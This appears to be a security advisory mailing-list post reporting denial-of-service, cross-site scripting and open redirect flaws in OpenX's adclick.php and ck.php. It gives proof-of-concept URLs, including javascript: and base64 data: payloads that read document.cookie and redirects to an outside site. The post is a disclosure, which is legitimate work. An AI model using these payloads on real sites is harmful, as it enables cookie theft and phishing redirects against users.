New vulnerabilities in OpenX

Hello 3APA3A!

I want to warn you about Denial of Service, Cross-Site Scripting and Redirector vulnerabilities
in OpenX.

DoS (Looped DoS):

http://site/adclick.php

About Looped DoS I wrote in my classification of DoS vulnerabilities in web applications
(http://websecurity.com.ua/2663/).

Vulnerable are possibly only all versions of Openads.

XSS:

http://site/adclick.php?maxdest=javascript:alert(document.cookie)

http://site/adclick.php?dest=javascript:alert(document.cookie)

Works in Mozilla, Firefox (up to version 3.0.9), IE6, Opera and Google Chrome. Vulnerable are
possibly only all versions of Openads, where Refresh header is using. In new versions (such as
OpenX v2.6.3) Location header is using and there is possible attack in browsers Firefox and Opera.

http://site/adclick.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Another redirector, which I wrote about before (http://websecurity.com.ua/3107/), is also
vulnerable to this attack:

http://site/www/delivery/ck.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Redirector:

http://site/adclick.php?maxdest=http://websecurity.com.ua

http://site/adclick.php?dest=http://websecurity.com.ua

Vulnerable are OpenX v2.6.3 and previous versions and potentially next versions (and all versions
of Openads). And for Redirector are vulnerable all versions of the system - OpenX v2.8.1 and
previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3380/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua